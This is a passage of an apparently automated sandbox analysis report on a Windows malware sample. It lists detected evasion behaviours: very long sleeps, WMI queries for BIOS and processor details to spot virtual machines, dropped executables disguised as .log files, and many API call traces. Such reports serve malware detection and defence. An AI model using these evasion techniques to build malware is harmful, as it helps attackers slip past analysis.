Source: C:\PerfDll\hyperProviderSavesinto.exe

Code function: 8_2_00007FFD9BC493F1 sldt word ptr [eax]

8_2_00007FFD9BC493F1

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599425
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599292
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598729
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598125
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598012
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597672
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597546
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597437
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597273
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597171
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597056
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596804
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596662
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596542
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596434
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596218
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596108
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595890
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595781
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595628
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595406
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594638
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594311
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593984
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593765
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593465
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593324
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593216
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593099
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592979
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592867
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592762
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3989	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5804	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Window / User API: threadDelayed 3527
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Window / User API: threadDelayed 6318
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 8408
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1449
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 2545
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 7455

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\PING.EXE	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	API coverage: 5.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\PING.EXE	API coverage: 5.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 3989 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 5804 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep count: 105 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep time: -105000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599812s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599425s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599292s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599094s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598729s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598234s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598125s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598012s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597672s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597546s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597437s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597273s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597171s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597056s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596804s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596662s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596542s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596434s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596327s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596218s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596108s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595890s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595781s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595628s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595515s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595406s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595296s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595187s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595077s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594968s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594859s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594750s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594638s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594530s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594421s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594311s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594203s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594093s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593984s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593875s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593765s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593656s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593465s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593324s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593216s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593099s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592979s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592867s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592762s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep count: 8408 > 30
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep time: -840800s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep count: 1449 > 30
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep time: -144900s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 2545 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -2545000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 7455 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -7455000s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\PerfDll\hyperProviderSavesinto.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D6647C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D930F0 FindFirstFileExA,	0_2_00007FF7F4D930F0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00D5A69B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00D6C220
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0 FindFirstFileExW,	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0 FindFirstFileExW,	9_2_00000216D26FDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0 FindFirstFileExW,	38_2_00000150E93EDCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0 FindFirstFileExW,	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0 FindFirstFileExW,	45_2_000002359B52DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0 FindFirstFileExW,	49_2_00000225DC64DCE0

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D850F4 VirtualQuery,GetSystemInfo,

0_2_00007FF7F4D850F4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599425
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599292
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598729
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598125
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598012
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597672
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597546
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597437
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597273
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597171
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597056
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596804
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596662
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596542
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596434
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596218
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596108
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595890
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595781
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595628
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595406
